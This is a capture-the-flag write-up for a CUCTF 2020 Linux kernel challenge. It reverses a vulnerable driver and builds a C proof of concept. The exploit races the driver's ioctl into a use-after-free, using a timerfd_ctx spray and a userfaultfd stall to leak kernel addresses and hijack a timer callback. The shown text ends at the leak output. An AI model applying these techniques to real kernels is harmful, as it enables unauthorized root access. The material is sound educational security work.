
[CUCTF 2020] Kernel Exploitation: Hotrod

Hotrod is a kernel exploitation challenge created by my friend FizzBuzz101 for CUCTF 2020. I tested the challenge before release, and since the exploitation process was really interesting, I decided to write this article. In the next sections we will see how to get a root shell by exploiting a UAF with a single allocation, a timerfd_ctx structure and userfaultfd. Let’s start!

Information Gathering

Before touching the kernel module, we need to better understand the system itself, gathering as much information as possible. We can start our analysis by inspecting run_challenge.sh:

#!/bin/sh

qemu-system-x86_64 \
    -s \
    -m 64M \
    -nographic \
    -kernel "./bzImage" \
    -append "console=ttyS0 quiet loglevel=3 oops=panic panic=-1 pti=on kaslr nosmap min_addr=4096" \
    -no-reboot \
    -cpu qemu64,+smep \
    -monitor /dev/null \
    -initrd "./initramfs.cpio" \
    -smp 2 \
    -smp cores=2 \
    -smp threads=1

We can immediately see that various protections are enabled.

SMEP (Supervisor Mode Execution Prevention):

With SMEP, the CPU generates a fault if code running in kernel mode tries to execute instructions located in user space pages. This means that even if we are able to control the kernel instruction pointer, we can’t simply map an executable memory region in user space, place our code there and jump to it.

Luckily, since SMAP (Supervisor Mode Access Prevention) is disabled, the kernel can still read and write user space data, so we can build our ROP-chain in user space, perform stack pivoting and start executing gadgets. Another approach is to clear bit 20 of the CR4 register (the SMEP enable bit) and then directly execute code in user space:

[Figure: CR4 register layout]
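To make the bit arithmetic concrete, here is a minimal sketch that tests and clears the SMEP bit in a saved CR4 value. The helper names are hypothetical and this is ordinary user space C: in a real chain, the resulting value would still have to be written back to CR4 from kernel context.

```c
#include <assert.h>
#include <stdint.h>

#define X86_CR4_SMEP (1ULL << 20) /* SMEP enable bit in CR4 */

static_assert(X86_CR4_SMEP == 0x100000, "SMEP is bit 20 of CR4");

/* Returns non-zero if the given CR4 value has SMEP enabled. */
int cr4_has_smep(uint64_t cr4)
{
    return (cr4 & X86_CR4_SMEP) != 0;
}

/* Returns the same CR4 value with only the SMEP bit cleared. */
uint64_t cr4_clear_smep(uint64_t cr4)
{
    return cr4 & ~X86_CR4_SMEP;
}
```

For example, a CR4 value of 0x1006f0 has SMEP set, and clearing bit 20 gives 0x6f0.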

KASLR (Kernel Address Space Layout Randomization):

With this option, every time the system boots up, the location of kernel code in memory is randomized. This means that if we want to build a ROP-chain, we will probably need to leak pointers to compute the current kernel base address.

KPTI (Kernel Page Table Isolation):

KPTI was introduced in the Linux kernel in response to the Meltdown vulnerability. It helps prevent information leaks by separating user space and kernel space page tables. By toggling bit 12 of the CR3 register, the system switches between two sets of page tables. When the system runs in kernel mode, it uses the first set, so it can access both the kernel and the user address space (the latter for things like copy_to_user). In addition, the NX flag is set in the top level of the user portion of the kernel page tables, so that any missed kernel-to-user CR3 switch causes a crash. When the system runs in user mode, it uses the second set instead: it can access a copy of the user address space, but only a limited portion of the kernel address space, namely the data needed to enter and exit the kernel and the IDT. This data is stored in the cpu_entry_area structure, placed in the fixmap.

[Figure: CR3 register layout]
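The CR3 switch described above boils down to flipping a single bit. The sketch below shows only that arithmetic, with hypothetical helper names and a made-up CR3 value. It ignores the PCID bits that the real entry code also handles.

```c
#include <assert.h>
#include <stdint.h>

#define PTI_PAGE_SHIFT        12
#define PTI_USER_PGTABLE_MASK (1ULL << PTI_PAGE_SHIFT) /* bit 12 of CR3 */

static_assert(PTI_USER_PGTABLE_MASK == 0x1000,
              "the user page tables sit one page above the kernel ones");

/* Kernel -> user: select the user copy of the page tables. */
uint64_t to_user_cr3(uint64_t cr3)
{
    return cr3 | PTI_USER_PGTABLE_MASK;
}

/* User -> kernel: select the full kernel page tables. */
uint64_t to_kernel_cr3(uint64_t cr3)
{
    return cr3 & ~PTI_USER_PGTABLE_MASK;
}
```

With an illustrative kernel CR3 of 0x2a3c000, the user CR3 is 0x2a3d000, and converting back clears the bit again.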

uname -a
Linux (none) 5.8.3 #12 Sun August 26 12:00:00 UTC 2020 x86_64 GNU/Linux

The kernel version is very recent, and I couldn’t find any known vulnerability that would allow privilege escalation.

We can proceed by extracting symbol addresses and ROP gadgets. Since the System.map file is not present and we can’t read /proc/kallsyms as an unprivileged user, we need to extract the filesystem and modify the init file to get root privileges.

The filesystem is packed as a cpio archive. We can extract it and replace the user uid/gid using the following commands:

mkdir fs && cd fs && cpio -idv < ../initramfs.cpio # Extract the archive
sed -i 's/setuidgid 1000 sh/setuidgid 0 sh/g' init # Replace the user uid/gid
find . | cpio --create --format='newc' > ../initramfs.cpio # Rebuild the archive

The next step is to disable KASLR, since we need default symbol addresses, without randomization:

sed -i 's/kaslr/nokaslr/g' run_challenge.sh

Finally we can get symbols from /proc/kallsyms.

I also created /bin/info, containing:

#!/bin/sh

HOTROD=$(cat /proc/kallsyms | grep hotrod_ioctl | cut -d " " -f1)
echo "[*] Module base: 0x$HOTROD"

Then I added /bin/sh /bin/info in the init file, so I can get the hotrod_ioctl address every time the system boots up. Very useful for debugging purposes.

Now we can re-enable KASLR, restore the user uid/gid to 1000 and rebuild the cpio archive.

To obtain ROP gadgets, we need to extract the kernel image. We can do it using binwalk to locate the gzip-compressed kernel image (vmlinux) inside bzImage:

binwalk bzImage

DECIMAL       HEXADECIMAL     DESCRIPTION
--------------------------------------------------------------------------------
15109         0x3B05          gzip compressed data, maximum compression, from Unix, last modified: 1970-01-01 00:00:00)

Then we can use dd to extract it and gunzip to decompress the archive:

dd if=./bzImage bs=1 skip=15109 of=vmlinux.gz && gunzip vmlinux.gz

Now we can finally extract ROP gadgets using a tool like ropper or ROPGadget:

ropper --file ./vmlinux --nocolor > gadgets

PS: We could also have used the extract-vmlinux script to extract the kernel image.

Reverse Engineering

file hotrod.ko
hotrod.ko: ELF 64-bit LSB relocatable, x86-64, version 1 (SYSV), BuildID[sha1]=6bcf4da490ac3e3ab5db8148eb08238250716d32, with debug_info, not stripped

As we can see, we have a 64-bit kernel module that includes debug information and is not stripped.

I won’t cover the reverse engineering process (from asm to pseudo C) in detail, to avoid unnecessarily lengthening the article. Here’s my high-level representation of the module after static analysis:

#define ALLOC 0xBAADC0DE
#define FREE  0xC001C0DE
#define SHOW  0x1337C0DE
#define EDIT  0xDEADC0DE

static DEFINE_MUTEX(hotrod_lock);

static unsigned int allocated, freed, showed, edited;
struct miscdevice hotrod_dev;
struct file_operations hotrod_fops;

hotrod_fops.unlocked_ioctl = hotrod_ioctl;

struct
{
    unsigned long size;
    char *content;
} req;


struct
{
    unsigned long size;
    char *content;
} hotrod;


int init_hotrod()
{

  mutex_init(&hotrod_lock);

  hotrod_dev.minor = 255; // MISC_DYNAMIC_MINOR
  hotrod_dev.name = "hotrod";
  hotrod_dev.fops = &hotrod_fops;

  if ( !misc_register(&hotrod_dev) )
  {

    printk(KERN_INFO "Hotrod Driver Initialized\n");
    printk(KERN_INFO "Remember, all of the features only work once!\n");

    return 0;
  }

  return -1;
}


int hotrod_ioctl(struct file *file, unsigned int action, unsigned long user_req)
{

    switch (action)
    {


        case ALLOC:
        {

            unsigned long allocation_size = user_req;

            if ( !allocated )
            {
                allocated = 1;

                if ( !hotrod.size && !hotrod.content && allocation_size >= 0xe0 && allocation_size <= 0xf0 )
                {
                    hotrod.content = kmalloc(allocation_size, 0xcc0); // 0xcc0 == GFP_KERNEL

                    if ( hotrod.content )
                    {
                        hotrod.size = allocation_size;
                        return 0;
                    }
                }
            }

            return -1;
       }


       case FREE:
       {
           if ( !freed )
           {
               freed = 1;

               if ( hotrod.size && hotrod.content )
               {
                   kfree(hotrod.content);
                   hotrod.content = 0;
                   hotrod.size = 0;
                   return 0;
               }
           }

           return -1;
       }


       case SHOW:
       {
            if ( !showed && hotrod.size )
            {
              showed = 1;

              if ( hotrod.content )
              {
                copy_from_user(&req, user_req, 0x10);

                if ( req.size <= hotrod.size )
                {
                    copy_to_user(req.content, hotrod.content, req.size);
                    return 0;
                }
              }
            }

            return -1;
       }


       case EDIT:
       {

         if ( !edited && hotrod.size )
         {
           edited = 1;

           if ( hotrod.content )
           {
             copy_from_user(&req, user_req, 0x10);

             if ( req.size <= hotrod.size )
             {
                 copy_from_user(hotrod.content, req.content, req.size);
                 return 0;
             }
           }
         }

         return -1;
      }


    }
}


void exit_hotrod()
{
  misc_deregister(&hotrod_dev);
  printk(KERN_INFO "Hotrod Driver Removed\n");
}

As we can see, the init_hotrod() function is using misc_register(), an interface offered by the misc driver to allow modules to register a misc device with the kernel.

In Linux, every device is identified by a major and a minor number. The major number is used by the kernel to identify the driver associated with the device. The misc driver is identified by the major number 10. The minor number depends on the device and it’s used by the driver to differentiate among various devices.

misc_register() takes as argument a miscdevice structure, in this case hotrod_dev.

We can see that in hotrod_dev, three fields are set:

  • minor: Set to 255 here, which corresponds to MISC_DYNAMIC_MINOR. As kernel.org explains: If the minor number is set to MISC_DYNAMIC_MINOR a minor number is assigned and placed in the minor field of the structure.

  • name: It leaves no room for imagination…

  • fops: A pointer to the file_operations structure. With this structure, we can expose functions that allow users to interact with the device. In this case unlocked_ioctl() is the only exposed function, which we will cover shortly.

After initialization, the device node is created in /dev. Hotrod now appears as a character device, on which it is possible to perform I/O operations using streams of characters:

ls -la /dev | grep hotrod
crw-rw-rw-    1 root     root       10,  63 Oct  19 09:11 hotrod

As we can see, the letter “c” indicates that Hotrod is a character device; its major number is 10 and its minor number is 63.

At this point we know that we can interact with the module using ioctl(). The hotrod_ioctl() function allows us to perform four different actions: Alloc, Free, Show and Edit. It’s important to note that we can perform each action only once!

The allocation size is limited to between 0xe0 and 0xf0 bytes. To understand what this means, let’s briefly introduce the Slab allocator. The Slab allocator is used by the Linux kernel to group objects of the same size into caches. Each cache consists of one or more slabs, and each slab is composed of one or more contiguous page frames. Each slab stores a certain number of objects.

There are two classes of caches:

  • General purpose caches: They are called kmalloc-N, where N is the object size, usually a power of two: kmalloc-64, kmalloc-128, kmalloc-256 and so on (kmalloc-96 and kmalloc-192 are the exceptions).

  • Specialized caches: Used for common objects: task_struct, mm_struct, vm_area_struct and so on.

[Figure: Slab allocator]

The Slab allocator uses a LIFO scheme to perform allocations and deallocations. The kernel will keep track of freed objects in a freelist and will serve them when a new allocation of the same size takes place.

(Of course this is just a basic overview of the Slab allocator; for a detailed analysis, check the articles in the References section.)

So for every allocation in the range 0xe0-0xf0 bytes (224-240 in decimal), the Slab allocator will use the kmalloc-256 cache.
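The rounding can be sketched as a simple table lookup. This is a simplified user space model, not kernel code: the size table is an assumption that matches common x86_64 builds, and the function name is hypothetical.

```c
#include <assert.h>
#include <stddef.h>

/* General purpose cache sizes up to 8 KiB (assumption: typical x86_64
 * configuration with a minimum kmalloc size of 8 bytes). */
static const size_t kmalloc_sizes[] = {
    8, 16, 32, 64, 96, 128, 192, 256, 512, 1024, 2048, 4096, 8192
};

/* Returns the object size of the smallest kmalloc-N cache that can hold
 * `size` bytes, or 0 if the request does not fit in the table. */
size_t kmalloc_cache_size(size_t size)
{
    assert(size != 0);

    for (size_t i = 0; i < sizeof(kmalloc_sizes) / sizeof(kmalloc_sizes[0]); i++)
        if (size <= kmalloc_sizes[i])
            return kmalloc_sizes[i];

    return 0;
}
```

Every size the module accepts, from 0xe0 to 0xf0, is larger than 192 and no larger than 256, so the lookup always lands on kmalloc-256.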

Continuing to analyze the code, we can see checks that prevent us from overflowing into the next object, and other checks that prevent a trivial UAF, Double Free and so on.

So, where is the bug?


The Bug

The old ioctl() implementation ran under Big Kernel Lock. From The new way of ioctl():

ioctl() is one of the remaining parts of the kernel which runs under the Big Kernel Lock (BKL).
In the past, the usage of the BKL has made it possible for long-running ioctl()
methods to create long latencies for unrelated processes.

Of course this was really inefficient in SMP environments, because while one ioctl operation held the BKL, no other code that needed the lock could run. Therefore, two new functions were introduced: unlocked_ioctl() and compat_ioctl(). In kernel version 2.6.36, the old ioctl implementation was completely removed, as we can see from kill .ioctl file_operation.

From The new way of ioctl() we can also understand the difference between the old and the new ioctl() implementation:

If a driver or filesystem provides an unlocked_ioctl() method, it will be called in preference to the older ioctl().
The differences are that the inode argument is not provided (it's available as filp->f_dentry->d_inode)
and the BKL is not taken prior to the call.
All new code should be written with its own locking, and should use unlocked_ioctl().

This completely changes the situation for us, opening new exploitation paths, because hotrod is using unlocked_ioctl() without any locking of its own: hotrod_lock is initialized in init_hotrod(), but hotrod_ioctl() never takes it!

It means that using two threads, we can exploit a race condition that will cause a Use After Free, leading to arbitrary code execution.

A basic idea is the following: let’s assume that we can use Alloc to get an allocation in kmalloc-256 and find a way to get a leak using Show. Then we can use Edit to copy our buffer from user space to the allocated memory region in kernel space. At the same time, from another thread, we use Free to deallocate the object, and then we allocate a structure of a suitable size, so that it lands in the same place. In this way the Edit operation writes into freed and reallocated memory (a UAF), hopefully overwriting function pointers in the new structure and letting us hijack the kernel instruction pointer.

Of course, to succeed in this plan, we need two elements:

  • A structure allocated in kmalloc-256: it will allow us to get a memory leak and hopefully to control the kernel instruction pointer.
  • A way to make our race condition reliable: we can perform each action only once, so we need to find a way to maximize the success rate of the race condition.
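To see why this interleaving is dangerous, here is a toy user space model of it. It is a deterministic replay of the steps rather than a real race, and everything in it (the one-slot allocator, the toy_timer type, the function names) is hypothetical and only mimics the behaviour described above.

```c
#include <assert.h>
#include <string.h>

struct toy_timer { void (*function)(void); };

/* A single 256-byte slot standing in for the kmalloc-256 freelist. */
static union { struct toy_timer timer; unsigned char raw[256]; } slot;
static int slot_in_use;

static void *toy_alloc(void)
{
    if (slot_in_use)
        return NULL;
    slot_in_use = 1;
    return &slot;
}

static void toy_free(void *p)
{
    if (p == (void *)&slot)
        slot_in_use = 0;
}

static int hijacked;
static void legit_callback(void) { }
static void attacker_callback(void) { hijacked = 1; }

/* Replays the interleaving step by step; returns 1 if the callback of the
 * new object ended up under attacker control. */
int simulate_race(void)
{
    hijacked = 0;

    void *content = toy_alloc();             /* thread A: Alloc */
    void *stale = content;                   /* thread A: Edit passes its checks, then stalls */

    toy_free(content);                       /* thread B: Free */
    struct toy_timer *victim = toy_alloc();  /* thread B: a new object reuses the slot */
    assert((void *)victim == stale);         /* same address, as with a LIFO freelist */
    victim->function = legit_callback;

    struct toy_timer payload = { attacker_callback };
    memcpy(stale, &payload, sizeof payload); /* thread A: Edit resumes and writes */

    victim->function();                      /* "timer expiry" calls the overwritten pointer */
    return hijacked;
}
```

The write in the last memcpy() is perfectly valid from Edit's point of view: it simply happens after the memory has changed owner.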

The structure - timerfd_ctx

As we can see from this useful article, an interesting structure allocated in the kmalloc-256 cache is timerfd_ctx.

struct timerfd_ctx
{
  union
  {
    struct hrtimer tmr;
    struct alarm alarm;
  } t;
  ktime_t tintv;
  ktime_t moffs;
  wait_queue_head_t wqh;
  u64 ticks;
  int clockid;
  short unsigned expired;
  short unsigned settime_flags;	/* to show in fdinfo */
  struct rcu_head rcu;
  struct list_head clist;
  spinlock_t cancel_lock;
  bool might_cancel;
};

The two members of the union are, respectively, an hrtimer structure:

struct hrtimer
{
  struct timerqueue_node node; // timerqueue node, which also manages node.expires
  ktime_t _softexpires; // the absolute earliest expiry time of the hrtimer.
  enum hrtimer_restart (*function)(struct hrtimer *); // timer expiry callback function
  struct hrtimer_clock_base *base; // pointer to the timer base (per cpu and per clock)
  u8 state; // state information (See bit values above)
  u8 is_rel; // Set if the timer was armed relative
  u8 is_soft; // Set if hrtimer will be expired in soft interrupt context.
};

And an alarm structure:

struct alarm
{
  struct timerqueue_node node; // timerqueue node adding to the event list this value also includes the expiration time.
  struct hrtimer timer; // hrtimer used to schedule events while running
  enum alarmtimer_restart (*function)(struct alarm *, ktime_t now); // Function pointer to be executed when the timer fires.
  enum alarmtimer_type type; // Alarm type (BOOTTIME/REALTIME).
  int state; // Flag that represents if the alarm is set to fire or not.
  void *data; // Internal data value.
};

This object is allocated every time we use timerfd_create() to create a timer instance. The timerfd_ctx structure is a good choice for us, because it allows us to leak kernel function pointers and kernel heap addresses. It is important to note that the structure is freed using kfree_rcu(), which deallocates the object with kfree() only after a grace period, to ensure the object is no longer used by any thread. We can simply work around this by calling sleep(1) after closing the timer to make sure the object has actually been freed; then we can use Alloc and Show to leak pointers.

Another important detail is that when the timer expires, the third field in the hrtimer structure, the function pointer (timerfd_tmrproc), is executed. This means that if we cause a UAF and then overwrite the function pointer, we will be able to control the kernel instruction pointer once the timer expires!

Here’s timerfd_ctx in memory. We are interested in the highlighted fields:

0xffff888000297900:  0xffff888000297900 [1]    0x0000000000000000  
0xffff888000297910:  0x0000000000000000        0x00000002ef81037a [2]             
0xffff888000297920:  0x00000002ef81037a [3]    0xffffffff81102a00 [4]
0xffff888000297930:  0xffffffff8183e080        0x0000000000000000      
0xffff888000297940:  0x0000000000000000        0x0000000000000000      
0xffff888000297950:  0x0000000000000000        0x0000000000000000      
0xffff888000297960:  0x0000000000000000        0x0000000000000000      
0xffff888000297970:  0x0000000000000000        0x0000000000000000      
0xffff888000297980:  0xbdbbd3bf6c2a6d81        0xffff888000297988      
0xffff888000297990:  0xffff888000297988        0x0000000000000000      
0xffff8880002979a0:  0x0000000000000000        0xffff88800013eb00      
0xffff8880002979b0:  0x00000000000000a8        0x0000000000000000      
0xffff8880002979c0:  0x0000000000000000        0x0000000000000000      
0xffff8880002979d0:  0x0000000000000000        0x0000000000000000      
0xffff8880002979e0:  0x0000000000000000        0x0000000000000000
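To map the dump back to field names, we can rebuild the start of the layout in user space and let the compiler compute the offsets. The structures below are hypothetical mocks that only mirror the field order of the definitions above on x86_64; they are not the kernel headers.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* User space stand-ins for the kernel types; only the layout matters. */
struct rb_node_mock { unsigned long parent_color; void *right; void *left; };
struct timerqueue_node_mock { struct rb_node_mock node; int64_t expires; };

struct hrtimer_mock {
    struct timerqueue_node_mock node; /* 0x00: rb node, then expires at 0x18 */
    int64_t _softexpires;             /* 0x20 */
    void *function;                   /* 0x28: expiry callback */
    void *base;                       /* 0x30 */
    uint8_t state, is_rel, is_soft;
};

static_assert(offsetof(struct hrtimer_mock, function) == 0x28,
              "layout assumes a 64-bit target");

/* Converts a byte offset into an index into an array of 8-byte words. */
size_t qword_index(size_t byte_offset)
{
    return byte_offset / sizeof(uint64_t);
}
```

Under these assumptions, the two expiry values sit at quadword indexes 3 and 4 and the callback at index 5, which matches fields [2], [3] and [4] in the dump.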

Optimize the race condition - userfaultfd

At this point we have the structure. Now we need to find a way to make the race condition reliable.

To succeed in our goal, we can take advantage of a feature of the Linux kernel: userfaultfd. This feature allows user space processes to handle page faults and other memory management tasks. For example, it can be useful to measure page fault latency, but it also has a dark side.

We can start monitoring a specific memory range, let’s say a page of memory, waiting for page faults. When the kernel tries to access that page, it causes a page fault and control is transferred to the page fault handler (our process in user space). This gives us the ability to suspend the kernel thread for N seconds and eventually exploit a race condition that will lead to arbitrary code execution!

The plan

Now that we have all the pieces of the puzzle, we can reformulate our plan in the following way:

To get a memory leak, we can allocate a timerfd_ctx structure using timerfd_create(), then we can close the file descriptor associated with the object, so the structure will be freed. Then, using Alloc we can get an allocation in the same place and using Show we can leak the timerfd_tmrproc pointer that will allow us to compute kernel base address.
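One straightforward way to turn the leaked pointer into usable addresses is to compute the KASLR slide and add it to every address taken from the nokaslr run. The sketch below shows that arithmetic. It is not the formula used by the PoC later in this article. The timerfd_tmrproc address comes from the nokaslr dump above, the text base is an assumed default for x86_64, and the helper names are hypothetical.

```c
#include <assert.h>
#include <stdint.h>

#define NOKASLR_TEXT_BASE       0xffffffff81000000ULL /* assumption: default kernel text base */
#define NOKASLR_TIMERFD_TMRPROC 0xffffffff81102a00ULL /* seen in the nokaslr dump */

static_assert(NOKASLR_TIMERFD_TMRPROC - NOKASLR_TEXT_BASE == 0x102a00,
              "offset of timerfd_tmrproc from the text base");

/* Difference between the randomized and the default load address. */
uint64_t kaslr_slide(uint64_t leaked_tmrproc)
{
    return leaked_tmrproc - NOKASLR_TIMERFD_TMRPROC;
}

/* Translates an address taken from the nokaslr run into the running kernel. */
uint64_t rebase(uint64_t nokaslr_addr, uint64_t leaked_tmrproc)
{
    return nokaslr_addr + kaslr_slide(leaked_tmrproc);
}
```

For instance, a leaked value of 0xffffffff8f102a00 would mean a slide of 0xe000000 and a kernel base of 0xffffffff8f000000.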

To control the kernel instruction pointer, let’s see what happens when we use Edit:

[...]
case EDIT:
{

  if ( !edited && hotrod.size )
  {
    edited = 1;

    if ( hotrod.content )
    {
      copy_from_user(&req, user_req, 0x10); // [1]

      if ( req.size <= hotrod.size )
      {
          copy_from_user(hotrod.content, req.content, req.size); // [2]
          return 0;
      }
    }
  }

  return -1;
}
[...]

The kernel copies the user request from user space to kernel space using copy_from_user() [1]. Then, after a size check, with a second call to copy_from_user(), the kernel copies req.size bytes from req.content to the memory region we have previously allocated using Alloc [2].

This means that we can map a memory region to use as req.content:

void *page = mmap((void *)0xdead000, PAGE_SIZE, PROT_READ|PROT_WRITE, MAP_FIXED|MAP_ANONYMOUS|MAP_PRIVATE, -1, 0);

Then we can create a thread that starts monitoring the mapped region using userfaultfd, waiting for a page fault. It will be our Page Fault Handler (PFH). Once the PFH is running, from the main thread, we can use Edit to force the kernel to access req.content, causing a page fault [2]. At this point control is transferred to the PFH and the faulting thread stays suspended. Now, still from our PFH, we can:

  • Use Free to deallocate the previously allocated object.
  • Create a timer that will allocate another timerfd_ctx structure in the same place (remember that freelists work in a LIFO manner).
  • Release the faulting thread that will overwrite the structure in memory.

Once the timer expires, we will be able to control the kernel instruction pointer!

                       +
                       |
                       |
            +----------v----------+
            |    create_timer()   |    +------+
            +----------+----------+           |
                       |                      |
                       |                      |
            +----------v----------+           |
            |      do_alloc()     |           +---->  Leak
            +----------+----------+           |
                       |                      |
                       |                      |
            +----------v----------+           |
            |      do_show()      |    +------+
            +----------+----------+
                       |
                       |
            +----------v----------+
            |   pthread_create()  +--------------------------+
            +----------+----------+                          |
                       |                                     |
                       |                          +----------v----------+
                       |                          |    userfaultfd()    |
                       |                          +----------+----------+
                       |                                     |
                       |                                     |
                       |                          +--------->+
                       |                          |          |
                       |                          |          |
                       |                          |   ... polling ...
                       |                          |          |
            +----------v----------+               |          |
            |      do_edit()      |               +----------+
            +----------+----------+                          |
                       |                                     |
                       X                                 PAGE FAULT         +------+
                                                             |                     |
                                                             |                     |
                                                  +----------v----------+          |
                                                  |      do_free()      |          |
                                                  +----------+----------+          |
                                                             |                     |
                                                             |                     |
                                                  +----------v----------+          |
                                                  |    create_timer()   |          +--->  Handle PF            
                                                  +----------+----------+          |
                                                             |                     |
                                                             |                     |
                                                  +----------v----------+          |
                                                  |      ioctl_ufd()    |          |
                                                  +----------+----------+          |
                                                             |                     |
                                                             |                     |
                       X                                  RELEASE           +------+
                       |
            +----------v----------+
            | Edit complete (UAF) |
            +---------------------+

The exploit - Controlling RIP

We can start writing the helper functions to interact with the device. Since we have ascertained that allocations in range 0xe0-0xf0 will go in kmalloc-256, we can use an arbitrary allocation size of 0xf0 bytes.

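#define _GNU_SOURCE
#include <fcntl.h>
#include <poll.h>
#include <pthread.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/ioctl.h>
#include <sys/mman.h>
#include <sys/syscall.h>
#include <sys/timerfd.h>
#include <linux/userfaultfd.h>

#define DEVICE_PATH "/dev/hotrod"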

#define ALLOC 0xBAADC0DE
#define FREE 0xC001C0DE
#define SHOW 0x1337C0DE
#define EDIT 0xDEADC0DE

#define PAGE_SIZE 0x1000

static int fd, ufd;
static unsigned long size = 0xf0;
static unsigned char buff[PAGE_SIZE]; // page-sized: UFFDIO_COPY reads a full page from it
static unsigned long kernel_base, leak, timerfd_ctx, pivot;
static void *page;

struct request
{
  unsigned long size;
  unsigned char *buff;
};


void hexdump(unsigned char *buff, unsigned long size)
{
    unsigned long i;

    for (i = 0; i < size/8; i++)
    {
      if ((i % 2) == 0)
      {
        if (i != 0)
            printf("  \n");

        printf("  %04lx  ", i*8);
      }

      unsigned long ptr = ((unsigned long *)(buff))[i];
      printf("0x%016lx", ptr);
      printf("    ");

    }
    printf("\n");
}


void do_alloc(unsigned long size)
{
  ioctl(fd, ALLOC, size);
}


void do_free(int fd)
{
  ioctl(fd, FREE);
}


void do_show(unsigned char *dest, unsigned long size)
{
  struct request req;

  req.size = size;
  req.buff = dest;

  ioctl(fd, SHOW, &req);
}


void do_edit(unsigned char *src, unsigned long size)
{
  struct request req;

  req.size = size;
  req.buff = src;

  ioctl(fd, EDIT, &req);
}

To create a timer instance, we can use:

int create_timer(int leak)
{
  struct itimerspec its;

  its.it_interval.tv_sec = 0;
  its.it_interval.tv_nsec = 0;
  its.it_value.tv_sec = 10;
  its.it_value.tv_nsec = 0;

  int tfd = timerfd_create(CLOCK_REALTIME, 0);
  timerfd_settime(tfd, 0, &its, 0);

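  if (leak)
  {
    close(tfd); // the context is released through kfree_rcu()
    sleep(1);   // wait for the grace period so the object is really freed
    return 0;
  }

  return tfd;
}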

Then we can proceed by writing the function to initialize userfaultfd:

int userfaultfd(int flags)
{
  return syscall(SYS_userfaultfd, flags);
}


int initialize_ufd()
{
  int fd;

  puts("[*] Mmapping page...");
  page = mmap((void *)0xdead000, PAGE_SIZE, PROT_READ|PROT_WRITE, MAP_FIXED|MAP_ANONYMOUS|MAP_PRIVATE, -1, 0);

  struct uffdio_register reg;

  if ((fd = userfaultfd(O_NONBLOCK)) == -1)
  {
    perror("[ERROR] Userfaultfd failed");
    exit(-1);
  }

  struct uffdio_api api = { .api = UFFD_API };

  if (ioctl(fd, UFFDIO_API, &api))
  {
    perror("[ERROR] ioctl - UFFDIO_API failed");
    exit(-1);
  }

  if (api.api != UFFD_API)
  {
    puts("[ERROR] Unexpected UFFD api version!");
    exit(-1);
  }

  printf("[*] Start monitoring range: %p - %p\n", page, page + PAGE_SIZE);

  reg.mode = UFFDIO_REGISTER_MODE_MISSING;
  reg.range.start = (long)(page);
  reg.range.len = PAGE_SIZE;

  if (ioctl(fd, UFFDIO_REGISTER,  &reg))
  {
    perror("[ERROR] ioctl - UFFDIO_REGISTER failed");
    exit(-1);
  }

  return fd;
}

And the page fault handler:

void *page_fault_handler(void *_ufd)
{
  struct pollfd pollfd;
  struct uffd_msg fault_msg;
  struct uffdio_copy ufd_copy;

  int ufd = *((int *) _ufd);

  pollfd.fd = ufd;
  pollfd.events = POLLIN;

  while (poll(&pollfd, 1, -1) > 0)
  {

    if ((pollfd.revents & POLLERR) || (pollfd.revents & POLLHUP))
    {
      perror("[ERROR] Polling failed");
      exit(-1);
    }

    if (read(ufd, &fault_msg, sizeof(fault_msg)) != sizeof(fault_msg))
    {
      perror("[ERROR] Read - fault_msg failed");
      exit(-1);
    }

    char *page_fault_location = (char *)fault_msg.arg.pagefault.address;

    if (fault_msg.event != UFFD_EVENT_PAGEFAULT || (page_fault_location != page && page_fault_location != page + PAGE_SIZE))
    {
      perror("[ERROR] Unexpected pagefault?");
      exit(-1);
    }

    if (page_fault_location == (void *)0xdead000)
    {
      printf("[+] Page fault at address %p!\n", page_fault_location);

      puts("[*] Freeing...");
      do_free(fd);

      puts("[*] Creating second timer...");
      create_timer(0);

      ((unsigned long *)(buff))[0x3] = 0x000000000eae0e65;
      ((unsigned long *)(buff))[0x4] = 0x000000000eae0e65;
      ((unsigned long *)(buff))[0x5] = 0x4141414141414141; // [1]

      puts("[*] Structure will be overwritten with: ");
      hexdump(buff, size);

      sleep(1);

      ufd_copy.dst = (unsigned long)0xdead000;
      ufd_copy.src = (unsigned long)(&buff);
      ufd_copy.len = PAGE_SIZE;
      ufd_copy.mode = 0;
      ufd_copy.copy = 0;

      if (ioctl(ufd, UFFDIO_COPY, &ufd_copy) < 0)
      {
        perror("ioctl(UFFDIO_COPY)");
        exit(-1);
      }

      exit(0);

    }
  }
  return NULL;
}

As we can see from [1], with this first POC we should be able to overwrite the kernel RIP with a bunch of “A”s. Finally we can write our main function:

int main(void)
{
  pthread_t tid;

  fd = open(DEVICE_PATH, O_RDONLY);

  puts("[*] Allocating/Freeing timerfd_ctx structure...");
  create_timer(1);

  puts("[*] Leaking timerfd_tmrproc address...");
  do_alloc(size);
  do_show(buff, size);

  puts("[+] Object dump: ");
  hexdump(buff, size);

  leak = ((unsigned long *)(buff))[0x5];
  timerfd_ctx = ((unsigned long *)(buff))[0];
  kernel_base = leak - 0x81102a00UL + 0x100000000UL;

  printf("[+] Leaked timerfd_ctx structure address: 0x%lx\n", timerfd_ctx);
  printf("[+] Leaked timerfd_tmrproc address: 0x%lx\n", leak);
  printf("[+] Kernel base address: 0x%lx\n", (0xffffffff00000000UL + kernel_base));

  int ufd = initialize_ufd();
  pthread_create(&tid, NULL, page_fault_handler, &ufd);

  puts("[*] Triggering page fault...");
  do_edit(page, size);

  pthread_join(tid, NULL);

}

Here’s the complete POC code: poc.c

We can compile the code using:

gcc -o poc poc.c -static -s -lpthread

Then we can copy the exploit into the qemu instance and execute it:

          / $ /home/user/poc
          [*] Allocating/Freeing timerfd_ctx structure...
          [*] Leaking timerfd_tmrproc address...
          [+] Object dump:
            0000  0xffff88800029bf00    0x0000000000000000      
            0010  0x0000000000000000    0x00000002e3f48042      
            0020  0x00000002e3f48042    0xffffffff81102a00      
            0030  0xffffffff8183e080    0x0000000000000000      
            0040  0x0000000000000000    0x0000000000000000      
            0050  0x0000000000000000    0x0000000000000000      
            0060  0x0000000000000000    0x0000000000000000      
            0070  0x0000000000000000    0x0000000000000000      
            0080  0xbd7dd3bf6c2aa381    0xffff88800029bf88      
            0090  0xffff88800029bf88    0x0000000000000000      
            00a0  0x0000000000000000    0xffff88800015ad00      
            00b0  0x00000000000000a8    0x0000000000000000      
            00c0  0x0000000000000000    0x0000000000000000      
            00d0  0x0000000000000000    0x0000000000000000      
            00e0  0x0000000000000000    0x0000000000000000    
          [+] Leaked timerfd_ctx structure address: 0xffff88800029bf00
          [+] Leaked timerfd_tmrproc address: 0xffffffff81102a00
